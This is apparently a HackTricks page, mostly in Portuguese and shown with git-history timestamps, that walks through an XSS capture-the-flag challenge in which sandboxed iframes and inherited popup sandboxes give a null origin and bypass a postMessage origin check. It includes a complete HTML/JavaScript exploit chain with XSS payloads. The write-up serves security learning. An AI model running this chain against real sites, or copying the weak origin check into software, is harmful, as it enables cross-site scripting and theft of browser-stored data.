hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-1.md

99 lines
5.7 KiB
Markdown
Raw Normal View History

# Bypassing SOP with Iframes - 1
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-10-13 00:56:34 +00:00
<details>
<summary>Support HackTricks</summary>
2022-10-13 00:56:34 +00:00
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-10-13 00:56:34 +00:00
</details>
{% endhint %}
2022-10-13 00:56:34 +00:00
## Iframes in SOP-1
2022-10-13 00:56:34 +00:00
Neste [**desafio**](https://github.com/terjanq/same-origin-xss) criado por [**NDevTK**](https://github.com/NDevTK) e [**Terjanq**](https://github.com/terjanq), você precisa explorar um XSS no código
2022-10-13 00:56:34 +00:00
```javascript
const identifier = '4a600cd2d4f9aa1cfb5aa786';
onmessage = e => {
const data = e.data;
if (e.origin !== window.origin && data.identifier !== identifier) return;
if (data.type === 'render') {
renderContainer.innerHTML = data.body;
}
2022-10-13 00:56:34 +00:00
}
```
O problema principal é que a [**página principal**](https://so-xss.terjanq.me) usa DomPurify para enviar o `data.body`, então, para enviar seus próprios dados html para esse código, você precisa **burlar** `e.origin !== window.origin`.
2022-10-13 00:56:34 +00:00
2023-06-06 18:56:34 +00:00
Vamos ver a solução que eles propõem.
2022-10-13 00:56:34 +00:00
### Burla de SOP 1 (e.origin === null)
2022-10-13 00:56:34 +00:00
Quando `//example.org` é incorporado em um **iframe sandboxed**, então a **origem** da página será **`null`**, ou seja, **`window.origin === null`**. Portanto, apenas incorporando o iframe via `<iframe sandbox="allow-scripts" src="https://so-xss.terjanq.me/iframe.php">` poderíamos **forçar a origem `null`**.
2022-10-13 00:56:34 +00:00
Se a página fosse **incorporável**, você poderia burlar essa proteção dessa forma (os cookies também podem precisar ser configurados para `SameSite=None`).
2022-10-13 00:56:34 +00:00
### Burla de SOP 2 (window.origin === null)
2022-10-13 00:56:34 +00:00
O fato menos conhecido é que quando o **valor sandbox `allow-popups` é definido**, então o **popup aberto** irá **herdar** todos os **atributos sandboxed** a menos que `allow-popups-to-escape-sandbox` seja definido.\
Assim, abrir um **popup** de uma **origem nula** fará com que **`window.origin`** dentro do popup também seja **`null`**.
2022-10-13 00:56:34 +00:00
### Solução do Desafio
2022-10-13 00:56:34 +00:00
Portanto, para este desafio, alguém poderia **criar** um **iframe**, **abrir um popup** para a página com o manipulador de código XSS vulnerável (`/iframe.php`), como `window.origin === e.origin` porque ambos são `null`, é possível **enviar um payload que irá explorar o XSS**.
2022-10-13 00:56:34 +00:00
Esse **payload** obterá o **identificador** e enviará um **XSS** de **volta para a página principal** (a página que abriu o popup), **que** irá **mudar a localização** para o **vulnerável** `/iframe.php`. Como o identificador é conhecido, não importa que a condição `window.origin === e.origin` não seja satisfeita (lembre-se, a origem é o **popup** do iframe que tem **origem** **`null`**) porque `data.identifier === identifier`. Então, o **XSS será acionado novamente**, desta vez na origem correta.
2022-10-13 00:56:34 +00:00
```html
<body>
<script>
f = document.createElement('iframe');
// Needed flags
f.sandbox = 'allow-scripts allow-popups allow-top-navigation';
// Second communication with /iframe.php (this is the top page relocated)
// This will execute the alert in the correct origin
const payload = `x=opener.top;opener.postMessage(1,'*');setTimeout(()=>{
x.postMessage({type:'render',identifier,body:'<img/src/onerror=alert(localStorage.html)>'},'*');
},1000);`.replaceAll('\n',' ');
// Initial communication
// Open /iframe.php in a popup, both iframes and popup will have "null" as origin
// Then, bypass window.origin === e.origin to steal the identifier and communicate
// with the top with the second XSS payload
f.srcdoc = `
<h1>Click me!</h1>
<script>
onclick = e => {
let w = open('https://so-xss.terjanq.me/iframe.php');
onmessage = e => top.location = 'https://so-xss.terjanq.me/iframe.php';
setTimeout(_ => {
w.postMessage({type: "render", body: "<audio/src/onerror=\\"${payload}\\">"}, '*')
}, 1000);
};
<\/script>
`
document.body.appendChild(f);
</script>
2022-10-13 00:56:34 +00:00
</body>
```
{% hint style="success" %}
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Treinamento AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Treinamento GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2022-10-13 00:56:34 +00:00
<details>
<summary>Suporte ao HackTricks</summary>
2022-10-13 00:56:34 +00:00
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
2022-10-13 00:56:34 +00:00
</details>
{% endhint %}